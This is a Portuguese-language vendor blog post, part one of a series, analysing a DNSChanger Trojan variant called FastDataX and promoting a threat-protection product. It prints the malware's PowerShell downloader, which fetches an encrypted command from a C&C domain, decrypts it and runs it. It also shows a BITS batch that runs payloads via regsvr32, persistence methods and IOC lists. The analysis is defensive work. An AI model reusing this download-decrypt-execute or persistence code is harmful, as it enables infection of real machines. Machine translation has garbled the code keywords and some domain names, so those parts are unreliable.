[Parte 1]: DNSChanger está de volta e mais perigoso do que nunca

 

Recentemente evidências de uma nova campanha para uma variante do infame DNSChanger Trojan, que, como o próprio nome diz, altera as entradas de DNS de um computador para apontar para servidores de nomes mal intecionados. O novo Trojan foi identificado por meio de alertas de detecção comportamental C & C na mais avançada plataforma do Sistema de Proteção contra a Ameaças Avançadas que é fornecida pela 4Security. Esses alertas, por sua vez,  acionaram uma investigação automática, que identificou outros domínios suspeitos e combinou todos os alertas relacionados em um incidente de segurança.

 

Quer saber mais sobre o Sistema de Proteção de Ameaças Avançadas clique aqui.

 

Usando ferramentas forenses da plataforma Sistema de Proteção contra a Ameaças Avançadas, foi possível determinar que a campanha DNSChanger utiliza características e padrões familiares, como scripts do PowerShell, trabalhos do BITS e padrões de comunicação usados ​​em campanhas anteriores. Mais análises revelaram o ponto inicial de infecção, payloads relacionados e domínios adicionais e concluíram que todos fazem parte da nova campanha. Curiosamente, a campanha faz uso de novos domínios que foram registrados em março de 2017 e ainda precisam ser vinculados ao DNSChanger. Por isso, acreditamos que as plataformas que usam inteligência artificial, cyber intelligence com base máquinas de aprendizado (machine learning), são de fato, verdadeiramente úteis para detectar, investigar, mitigar e resolver incidentes como os reconhecidos APTs (Advanced Persistent Threat) que causam estragos financeiros em todos os cantos do planeta. Estima-se, segundo a MMC, que os prejuízos financeiros podem chegar até R$ 6,2 Trilhões de Reais. Leia mais aqui.

As campanhas DNSChanger anteriores estavam intimamente conectadas ao Adware e aos PUAs como fonte de (re) infecção. A campanha utiliza um arquivo chamado “fastdatax.exe” e a análise inicial sugere que isso pode ser o DNSChanger. Este arquivo cria as tarefas do BITS, que fazem as conexões de rede do DNSChanger para baixar e executar cargas úteis (payloads).

Nomeamos a campanha atual “FastDataX”, uma vez que gira em torno de um software com esse nome e se comunica com os sites da FastDataX [palavra do dicionário] .info.

O relato detalhado das descobertas da equipe de pesquisa incluem:

 

  • Detecção inicial do malware por meio de alertas comportamentais de C & C
  • Análise forense do ponto de infecção
  • Métodos de persistência
  • Análise de tráfego de rede relacionada
  • Lista de IOCs

 

DETECÇÃO INICIAL

 

O Sistema de Proteção de Ameaças Avançadas emitiu vários alertas comportamentais de C & C pertencentes a vários domínios fastdatax * .info e iniciou uma investigação automática:

Sistema de Proteção contra Ameaças Avançadas– Alerta C & C (Análise Comportamental):

 

 

 

Sistema de proteção contra ameaças Avançadas – Análise de link:

 

 

PONTO DE INFECÇÃO

 

A análise forense do terminal alertado revelou o seguinte cenário: Um usuário baixou voluntariamente um arquivo malicioso de algum site de compartilhamento de arquivos, depois que o usuário clicou duas vezes no arquivo, um arquivo .xht (XHTML, um arquivo HTML definido como XML aplicação) foi descartado e executado.

O arquivo .xht incluía um link para:

http [: //] ab0cd85de032858b2efc-98b168bd21c640d1dbb3a0f567ddbbfe.r14.cf1.rackcdn.com/kOcQm1koU2hOmFWMxOJbQo0m9p/lpx.html

Além disso, exibiu várias imagens hospedadas pelo imgur.com, que são instruções sobre como salvar e executar o software baixado:

 

 

A execução do arquivo também desencadeou uma cadeia de eventos que levou à instalação de vários pacotes de software que podem ser categorizados como PUP/Adware. Entre eles estavam o YeaDesktop , PCCleanPlus , X-Madbench e FastDataX . Destes adwares, FastDataX estava olhando mais curioso e insidioso

Como nas campanhas anteriores (que abusaram de aplicativos como o Optimizer Pro e System Healer), esses Adware são o segundo estágio de infecção do DNSChanger.

 

PERSISTÊNCIA

 

Diversos mecanismos de persistência foram utilizados pelo PUP/Adware instalado:

  • Registro ‘run’ key – abusado por tal Adware como YeaDesktop
  • Tarefas agendadas com o nome do aplicativo, abusadas pelo Adware como ‘Pangody’ e X-Madbench. Por exemplo, uma tarefa agendada chamada “X-Madbench”, que executa rundll32 “C: \ Arquivos de programas \ X-Madbench \ X-Madbench.dll”, SceNcISYvR
  • Tarefas agendadas com nomes aleatórios e GUID que executam DLLs via rundll32. Por exemplo, a tarefa agendada denominada “E3605470-291B-44EB-8648-745EE356599A”
  • Tarefas agendadas com nomes aleatórios que executam o PowerShell (veja mais detalhes abaixo)
  • Trabalhos BITS (veja mais detalhes abaixo)

 

PowerShell

 

O FastDataX.exe mantém a persistência por meio de uma tarefa agendada chamada “FastDataX”, e uma tarefa agendada adicional é criada em uma estrutura GUID ( 7D0A0D47-057F-040C-7E11-7E0D7905117D ). Esta tarefa é composta pelo seguinte PowerShell:

$ ErrorActionPreference = ”stop”;
$ sc = “SilentlyContinue”;
$ WarningPreference = $ sc;
$ ProgressPreference = $ sc;
$ VerbosePreference = $ sc;
$ DebugPreference = $ sc;
/ ************************************************* ***********
atualização do registro – posicione as janelas fora dos limites da tela
\ ************************************************* *********** /
função RegistryUpdate ($ p) {
$ n = “WindowPosition”;
experimentar{
New-Item -Path $ p | Out-Null;
}
pegar{
}
experimentar{
New-ItemProperty -Path $ p-nome $ n -PropertyType DWORD -Valor 201329664 Voltar para o início |
Out-Null;
}
pegar{
experimentar{
Set-ItemProperty -Path $ p -Name $ n -Value 201329664 | Out-Null;
}
pegar{
}
}
}
RegistryUpdate (“HKCU: \ Console \% SystemRoot% _System32_WindowsPowerShell_v1.0_powershell.exe”);
RegistryUpdate (“HKCU: \ Console \% SystemRoot% _System32_svchost.exe”);
RegistryUpdate (“HKCU: \ Console \ taskeng.exe”);
/ * este é o URL com os parâmetros GET * /
$ surl = ”http [: //] fastdataxster [.] info / u /? a = 2tpeW5PNy / ** recortado por Sistema de Proteção Contra Ameaças Avançadas para proteger a privacidade do cliente * / ”;
/ * fim do URL com params * /
$ stsk = ”{
7D0A0D47-057F-040C-7E11-7E0D7905117D
}
“;
$ prid = ”FastDataX”;
$ inid = ”NRMNUMSW”;
experimentar{
/ * verificar a versão do PS – se 1 sair) * /
if ($ PSVersionTable.PSVersion.Major -lt 2) {
pausa;
;
}
$ v = [System.Environment] :: OSVersion.Version;
/ * verifica se o env do Windows é inicial, em seguida, 8, saia se for * /
if ($ v.Major -eq 5) {
if (($ v.Minor -lt 2) -AND ((Get-WmiObject Win32_OperatingSystem).
ServicePackMajorVersion -lt 2)) {
pausa;
;
}
}
/ * verificação de usuário autorizado – se não for administrador – saia * /
if (-NOT ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]
:: GetCurrent ()). IsInRole ([Security.Principal.WindowsBuiltInRole] “Administrador”)) {
pausa;
}
/ ************************************************* ***********
* GET Solicite, baixe mais instruções, usando um UA “legítimo” (não realmente)
\ ************************************************* *********** /
função downloadCmd ($ url) {
$ rq = New-Object System.Net.WebClient;
$ rq.UseDefaultCredentials = $ true;
$ rq.Headers.Add (“user-agent” “Mozilla / 4.0 (compatível; MSIE 7.0; Windows NT 6.1;)”);
return [System.Text.Encoding] :: ASCII.GetString ($ rq.DownloadData ($ url));
}
/ ************************************************* ************************ \
* Esquema de descriptografia (segundo byte no stream usado como XOR + Offest, depois AND 0xFF
\ ************************************************* *********************** /
function decryptCmd ($ rawdata) {
$ bt = [Convert] :: FromBase64String ($ rawdata);
$ ext = $ bt [0];
$ key = $ bt [1] -bx ou 170;
para ($ i = 2;
$ i -lt $ bt.Length;
$ i ++) {
$ bt [$ i] = ($ bt [$ i] -bxor (($ chave + $ i) -band 255));
}
return (New-Object IO.StreamReader (New-Object IO.Compression.DeflateStream
(New-Object IO.MemoryStream ($ bt 2 ($ bt.Length- $ ext))) [IO.Compression.CompressionMode]
::Descomprimir)))
.ReadToEnd ();
}
$ sc = decryptCmd (downloadCmd ($ surl));
Invoke-Expression -command “$ sc”;
}
pegar{};
saída 0;

Este script PS combina uma mensagem GET de saída para informações do fastdataxster [.] E um corpo descriptografado. A resposta descriptografada contém dados de execução e, portanto, pode expandir as habilidades do malware quando desejar.

A estrutura deste PowerShell é semelhante a um script PS DNSChanger analisado anteriormente . Deve-se notar que o domínio incorporado no script é novo e não foi vinculado anteriormente à campanha DNSChanger.

 

Trabalho BITS:

 

O FastdataX também usa trabalhos BITS (Serviço de Transferência Inteligente em Segundo Plano) que geram mensagens HTTP Head para informações rápidas [.] Info e fastdataxfire [.]. Não foi possível encontrar informações on-line sobre esses domínios ou qualquer associação entre eles e a campanha atual de malware.

Dito isto, os dois tipos de trabalho do BITS são idênticos aos trabalhos do BITS analisados ​​anteriormente .

O trabalho BITS a seguir é um exemplo de uma tarefa recuperada dos logs do BITS do endpoint infectado e é usada para baixar, instalar e executar a limpeza das cargas de malware.

 

Tarefa do BITS para criar lote

 

“cmd.exe” / c start / minuto cmd / c “(echo @echo desativado>” C: \ ProgramData \ 4806190a-7c75-

1 \ x.bat “&

bitsadmin de echo / completo 4806190a-7c75-1 ^> nul >> “C: \ ProgramData \ 4806190a-7c75-

1 \ x.bat “&

echo bitsadmin / cancele 4806190a-7c75-1 ^> nul >> “C: \ ProgramData \ 4806190a-7c75-

1 \ x.bat “&

eco se existir “C: \ ProgramData \ 4806190a-7c75-1 \ 4806190a-7c75-1.d” goto q >>

“C: \ ProgramData \ 4806190a-7c75-1 \ x.bat” &

para / f% i em (‘dir / a: -d / b / w “C: \ ProgramData \ 4806190a-7c75-1 \ * .tmp”‘) do (echo start

/ b / min regsvr32.exe / s / n / i: “! = 477863894806190a” “C: \ ProgramData \ 4806190a-7c75-1 \% i”

>> “C: \ ProgramData \ 4806190a-7c75-1 \ x.bat”))> nul &

echo: q >> “C: \ ProgramData \ 4806190a-7c75-1 \ x.bat” &

iniciar / b / min regsvr32.exe / s / n / i: “! = 477863894806190a” “C: \ ProgramData \ 4806190a-7c75-

1 \ 4806190a-7c75-1d “>>” C: \ ProgramData \ 4806190a-7c75-1 \ x.bat “&

eco do “C: \ ProgramData \ 4806190a-7c75-1 \ x.bat” ^ & exit >> “C: \ ProgramData \ 4806190a-

7c75-1 \ x.bat “&

“C: \ ProgramData \ 4806190a-7c75-1 \ x.bat” “./. S-1-5-21-3582221642-4087043515-2770962101-1001

 

Alterações nas configurações de DNS

 

DNSChanger tem usado um dos três métodos para alterar as configurações de DNS:

  • Modificando as configurações ‘NameServer’ e ‘DHCPNameServer’ no registro do Windows, substituindo assim os servidores configurados por novos servidores DNS (chamando o DhcpNotifyConfigChange (API)
  • Alterando a configuração do DNS do roteador (conforme analisado)
  • Editando o arquivo HOSTS local

A variante ‘FastDatax’ do DNSChanger está usando o terceiro método. Ele adiciona vários domínios (consulte a lista na seção IOC deste artigo) que são usados ​​para baixar cargas úteis adicionais

 

ANÁLISE DE REDE

 

Uma análise com o componente do Sistema de Proteção contra Ameaças Avançadas Network Forensics, que permite uma análise de rede detalhada, revelou evidências da comunicação C & C do malware:

 

 

Isso permitiu que a equipe de pesquisa da Cyber ​​distinguisse entre três tipos de sessões com estruturas semelhantes:

  1. HEAD solicita sessões para “fastdataxfier [.] Info” e “fastdataxcast [.] Info”. Como discutido acima, estes são gerados por tarefas BITS FastDataX:

 

 

2. GET solicita sessões para “fastdataxster [.] Info” que foram geradas pelo script PowerShell mencionado acima:

 

3. Sessões de solicitação POST para “informações rápidas do [.] “, “ Informações do fastdataxium [.] ” E “informações do fastdataxify [.] ”

 

 

Deve-se observar que todos os domínios do FastDataX resultaram no endereço IP 81.171.14.67, que foi usado na campanha DNSChanger anterior.

Como pode ser visto nas imagens acima, os agentes do usuário usados ​​pelo malware são diferentes uns dos outros e são falsificados. Um exemplo perceptível para isso é um “bug” na geração de um user agent, onde a palavra “user agent” aparece duas vezes.

Ele tem uma estrutura de tráfego semelhante que foi observada no passado e se referiu ao DNSChanger, onde os parâmetros continham informações do sistema e informações de configuração do DNS.

Abaixo está uma lista de IOCs identificados relacionados à campanha FastDataX.

IOCs

Domínios / IPs:

Visto em 21-22.06.2017 em Sistema de Proteção Contra Ameaças Avançadas
81.171.14.67
informação de fastdataxium [.]
fastdataxcast [.] informação
fastdataxfire [.] informações
fastdataxster [.] informações
fastdataxient [.] informações
fastdataxify [.] informação

Domínios relacionados:

Domínio Data de replicação do DNS passivo
fastdataxate.info 2017-07-07
fastdataxsage.info 2017-07-06
fastdataxigy.info 2017-07-05
fastdataxopoly.info 2017-07-05
fastdataxace.info 2017-06-30
fastdataxcube.info 2017-06-27
fastdataxdigita.info 2017-06-27
fastdataxmage.info 2017-06-27
fastdataxmancer.info 2017-06-27
fastdataxmaven.info 2017-06-27
fastdataxpro.info 2017-06-27
fastdataxrunner.info 2017-06-27
fastdataxstar.info 2017-06-27
fastdataxster.info 2017-06-27
fastdataxity.info 2017-06-27
fastdataxality.info 2017-06-27
fastdataxfeed.info 2017-06-25
fastdataxcast.info 2017-06-21
fastdataxfire.info 2017-06-21
fastdataxient.info 2017-06-21
fastdataxify.info 2017-06-21
fastdataxium.info 2017-06-21
fastdataxio.info 2017-06-08

Domínios encontrados dentro do arquivo HOSTS

agent.wizztrakys [.] com
bestoffersfortoday [.] com
bigpicturepop [.] com
bongadoom [.] com
burningcube [.] ru
csdimonetize [.] com
dl.azalee [.] site
dl.smashdl [.] com
downloadmyhost [.] com
dwl0.wizzlabs [.] com
dwl1.wizzlabs [.] com
getthefilenow [.] com
healthydownload [.] com
installpixel [.] com
internalcampaigntargets [.] com
levando2download [.] com
mess1.wizzmonetize [.] com
titiaredh [.] com
wapcanalyticsystem [.] com
wepcdisplaysystem [.] com
wepcmainsystem [.] com
wizzcaster [.] com

Hashes:

MD5 SHA256 Descrição
fdfebd2ba002b18eac079a1ac21ef70d 16ea0a1c090e8084cbee7d5b9eb55d07d7db09eb58ee93fe096c9b624d9dae64 Descarregador de carga útil (.xht)
a11e1be8f9418f4e075b4c9794bc75f8 a779534bd4110602ef630a0afe8031f931d7fa4f7ef84b3e449d915a60d1b0ea Pangody.dll
8c03a0be7aadec4506fc52c4a507e320 f1eda24967aafc09d82418d8e92a189221bdfe52befa7cbbdb6d8642a8ffd5b8 X-Madbench.dll

 

Continue lendo: Parte 2: DNSChanger está de volta e muito mais perigoso